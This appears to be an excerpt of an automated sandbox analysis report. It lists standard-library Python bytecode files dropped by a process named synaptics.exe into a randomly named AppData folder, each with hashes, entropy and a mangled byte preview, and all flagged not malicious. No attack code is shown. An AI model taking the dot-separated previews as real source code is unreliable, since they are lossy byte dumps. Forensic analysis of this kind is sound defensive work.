                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5818
                                                                                                                                                                                                            Entropy (8bit):5.456522838915642
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:hPp0xXxswv10EIJ2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzs:tqrswv2MGmxMGb+rIWkOFldkS
                                                                                                                                                                                                            MD5:611152F5488B818F49B4CFEA071EBA61
                                                                                                                                                                                                            SHA1:F60D3336F654D59116DD97C4D144CF213C54DFED
                                                                                                                                                                                                            SHA-256:A67AE550AC11BBE8E34A0F0BF1B747BB5619BD2DB02853149CC4C7A1CD3FD4ED
                                                                                                                                                                                                            SHA-512:B7AE1DD73B1C3D61FFEB82FFE9BD7A20E075D10BC480FF8CBF03E4B62AF65004CF2A95EE46C4DED828B5086B056C1805010449667DAF47D13CE36F5E0847C610
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22772
                                                                                                                                                                                                            Entropy (8bit):5.438081014311851
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:b151Eqqa1srwKCiPSFSU2hf9xjTW8tCX21XiF+2YSNJWQhkYM+CS:bzJKZCiRTLCX2B1UJWbYVCS
                                                                                                                                                                                                            MD5:51A4D4B899EAAD056F7BBB2FDBB3B359
                                                                                                                                                                                                            SHA1:0AFDF75128C2166EC1134AA4E3A05410079CC066
                                                                                                                                                                                                            SHA-256:3924BABB88176CE9B98BD8593C4AD0B75095D5D3EB700F20F28F77335FEE70F3
                                                                                                                                                                                                            SHA-512:2D73AFAA991B9FD523BA1ACD78FB9C6C46A311FC6348ABD84AB9E4509CEB20EA21C10B29788F025193AB938AF6DFC27CA644A1B5766D20FB0321850AB88A44AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14251
                                                                                                                                                                                                            Entropy (8bit):5.2130219235974415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:puPJsiNrHyo42OkRFvMKUryx95qoxSEMbZ:pCJssrSo/fRAry/5qoUEMbZ
                                                                                                                                                                                                            MD5:C54DAC56169F8B8249DE513773AC7DE8
                                                                                                                                                                                                            SHA1:C75D7985CE11205457178BFFE9717A744BCEDF4D
                                                                                                                                                                                                            SHA-256:7564F8C8FABD68D9483A5C8F160775A1DC098EC250638723A14A191912355F32
                                                                                                                                                                                                            SHA-512:EFE813828AAF01A9C849AAC629A644BFC3AF545915933233D65B78A4CFEDC15F2D4BBB0BEC1DF369B7DF010BCDD53A84114470058BF8C8A8BEB2D1C176B5C4EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5274
                                                                                                                                                                                                            Entropy (8bit):5.041464402763656
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ednTWdWdlUgN2VsfA2IywpvIyRbepiRtHv+gm0AUY:iTDk52elRKMjmZB
                                                                                                                                                                                                            MD5:FD3C77D436922AE428662409F86B620F
                                                                                                                                                                                                            SHA1:9779CCB0AF5449C374C203211D46D9B87667AD20
                                                                                                                                                                                                            SHA-256:A222870D88667508CB7924C170571DC2E54B1AF5152233B7C469C03417D6C218
                                                                                                                                                                                                            SHA-512:2A3148B597AF64D575A78C538D2452707EDE31639E1AA3DFA9840C35CB154D5F0D35E62BCC45536DF3EF1E598004DC9F9D36B347227ED440E4DE2AAD37A88893
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17129
                                                                                                                                                                                                            Entropy (8bit):5.182512602408802
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:pjj7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvBeL:pjj7Dm/9rSzzBdIn7SQSkbvRkE4FvBeL
                                                                                                                                                                                                            MD5:7CC75003CFCFBBA5EA69D6D04B0E4B7F
                                                                                                                                                                                                            SHA1:D606F273EE9E0365B7E523226FB333F800009523
                                                                                                                                                                                                            SHA-256:02FC98423794AD43561D300A66C4FD6EE074B6F8237B8C9DC0BB249D1F1250AB
                                                                                                                                                                                                            SHA-512:49548F7CA1E0656AE3BCA6F056865132F039475A983FAAC619BBFED28A69A109F375D06D52CA1C9B96FBE8F06D53A74B66D091D974B862CF44BF73105D66B1CD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7806
                                                                                                                                                                                                            Entropy (8bit):5.513146744149605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mQrdt23n7sJQxhSaL09FKXY5nzg9gn1yiEWE5cnPrrvX:5rswJb9FKo5zg9g1yLZ6Pf
                                                                                                                                                                                                            MD5:6F459B72E057D594ED3EE67902D4D5A9
                                                                                                                                                                                                            SHA1:ACDD8E1C7C639AFB7FF7909A220BCD3C2AE8FCEF
                                                                                                                                                                                                            SHA-256:B8E72C08B2805955B66F8C7981D9214D4B2224F8196C0C97181058DCF29521DC
                                                                                                                                                                                                            SHA-512:FE01E0E950C31DB4306F8FC801E8314818835DC56D0DA0E8417BA961DD74A2D699A0898F1AAA87DE288477A37B464B797EE92D8176F0D97911E1DBC52AB504A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38385
                                                                                                                                                                                                            Entropy (8bit):5.531767143289951
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:B6QoETanIk41k7RiruyBW6rZiFuTPgtyQwye+idEd4jalseGehtq:B6QoEMIBddYATPgtyQwye+idEd4useGr
                                                                                                                                                                                                            MD5:0C59F8221A32CB3615DC7EF000FFA338
                                                                                                                                                                                                            SHA1:177E27461D3CCAC987BBF7969D4418DE1AC5AF2A
                                                                                                                                                                                                            SHA-256:E81837C4D4A0119D31DA3498D076407A07B4998BB511A1A45B150D23FD707C2A
                                                                                                                                                                                                            SHA-512:BD79FA67A94220CAC555078875597A6778B3062654261A730377188129E582DFA210D5BA6486579101ABFD02619B7F1D074F6F20F86BE22DD75A6651730AB40F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2959
                                                                                                                                                                                                            Entropy (8bit):4.885970071996527
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l0ynPssxfA01vMnyiwQQDGnvsSZdCztcKcynJyDywm18XQfkt+A7BN5XjyubuOAh:/UshAkuynrGvsqG6PiJyDywmcQq+A7DU
                                                                                                                                                                                                            MD5:756BBA13F15A8F0D84D1F3435FEC15AB
                                                                                                                                                                                                            SHA1:2482CFFBD7AC4AA147D24DF42082BAFAD7A47BDE
                                                                                                                                                                                                            SHA-256:48A978DBA8E6C533B5EB9DE9C27316D24D61192D37BB7708493198E95523865E
                                                                                                                                                                                                            SHA-512:8571EDD193CDE72AE2813C3C422C4B046B117939710E3AEDC65084554A9C5F778A404356F38030B22F9309372324289C83B6EB363457CFB362A6C268EF2C314C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...Z.e...d.e.d.d.......e...d.e.d.d.......d.e.v.r0e...d.e.d.d.......d.d...Z.d.d...Z.d.d...Z.e.e.j...d.d.....Z.e.e.j...d.d.....Z.d.e.v.r[e.e.j...d.d.....Z.d.e.v.rhe.e.j...d.d.....Z.d.e.v.rue.e.j...d.d.....Z.d.e.v.r.e.e.j...d.d.....Z.[.[.d.S.)......N)...*)...IntEnum..Signalsc....................C...s(...|.....r.|...d...o.|...d.....p.|...d...S.).NZ.SIGZ.SIG_Z.CTRL_)...isupper..startswith....name..r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\signal.py..<lambda>....s............r......Handlersc....................C........|.d.v.S.).N)...SIG_DFL..SIG_IGNr....r....r....r....r....r.................pthread_sigmaskZ.Sigmasksc....................C...r....).N).Z.SIG_BLOCKZ.SIG_UNBLOCKZ.SIG_SETMASKr....r....r....r....r....r........r....c....................C...s"...z.|.|...W.S...t.y.......|...Y.S.w.).zsConvert a numeric value to an IntEnum member.. If it's not a known member, return the numeric value itself.. )...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17404
                                                                                                                                                                                                            Entropy (8bit):5.511397919017041
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Dlp9Tn42l1YP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:lL42l+g7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                            MD5:DC3396AD7E4BB23866F885FE36828E60
                                                                                                                                                                                                            SHA1:19C78C2ABFFBA54E2C14D223CF3BF51CFAC771DF
                                                                                                                                                                                                            SHA-256:380D5111ED99783D37F17A5C1BF3A9D6FA4473EEEE006F5EA689B7E54F86359D
                                                                                                                                                                                                            SHA-512:7934C4E96ABB514CAB69D1EB3F0CD598A5DD060C41BE708FA04952D518B59DA6D2AD29ADD21E8A0934C8C9DAD97AA1AAC53E7867DAE23259376F6690FD8D36F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28987
                                                                                                                                                                                                            Entropy (8bit):5.53552893159753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:0twxW9l/P/XkfjdJRP8zqEhlM+Se4EwQ04PmNn9N:0OxmpQ6z3hlGe4EwQ0uc9N
                                                                                                                                                                                                            MD5:11C130544F0BEA206958A9A05F256B61
                                                                                                                                                                                                            SHA1:DE7AF2B1EDADB8501F6DD6E5045B23DB40A938FE
                                                                                                                                                                                                            SHA-256:694BEE3F9C6EE9610B184EF1CD17E18EDB6C9EE09FFA782F37CD272745BA9B1C
                                                                                                                                                                                                            SHA-512:E3A41A0ACF815F6B2D338EED753831C07657673B8049E602EE580EEFAE4038689F9D0ABCE2F2E23543C790C50EEBB741E8DCD0B3BCC48C8AB887E08419378B74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15218
                                                                                                                                                                                                            Entropy (8bit):5.609478703746726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:pyz34fmVm0PVclj2zdkPUdGHUawOXL1T6MQwo39h5OjuMxK67zG:pynV8j8KMdv4h6nwoNDO3xK67zG
                                                                                                                                                                                                            MD5:90EA0A0C8A44A245D07AA2DDDC2743FF
                                                                                                                                                                                                            SHA1:EE3AB78758B84C6A7780FDE7B36B9C29BD1FC370
                                                                                                                                                                                                            SHA-256:F4AE1770260F3C99FDB1B7ECCC455CA303219B3509054426BA9CBD70B859DA5C
                                                                                                                                                                                                            SHA-512:C6DE45669BCBBAE8F3FF544D34ABAA9C91C700B73F209D710359B06253788690065CBAE7237F260516D2109F6080A9A48218885BFE3C65B270833D15F111EC43
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6381
                                                                                                                                                                                                            Entropy (8bit):5.777986479503165
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:V7jrG4iQ2AaI2Ym9PqQBI1I1dadE1ff7l17mwvYhaSEZ84C:VM9OIdNfT6E8
                                                                                                                                                                                                            MD5:96F37B23354116A9AADE7ADC3C2F10F7
                                                                                                                                                                                                            SHA1:CE9CA291A03383ACB78A581C681FAC51D5940212
                                                                                                                                                                                                            SHA-256:8A01649349D422C9F478D1638FC525A60483D9A8446046006531CF0B52A5C3F4
                                                                                                                                                                                                            SHA-512:A4343CE1F552B210EC22732E6791528237A105A0F6C6F8A588DCC759D0A6798DFDD6157FD645FE088C19D6F5291D4FB19A24B87179DAA9B445F20C9046F814E6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
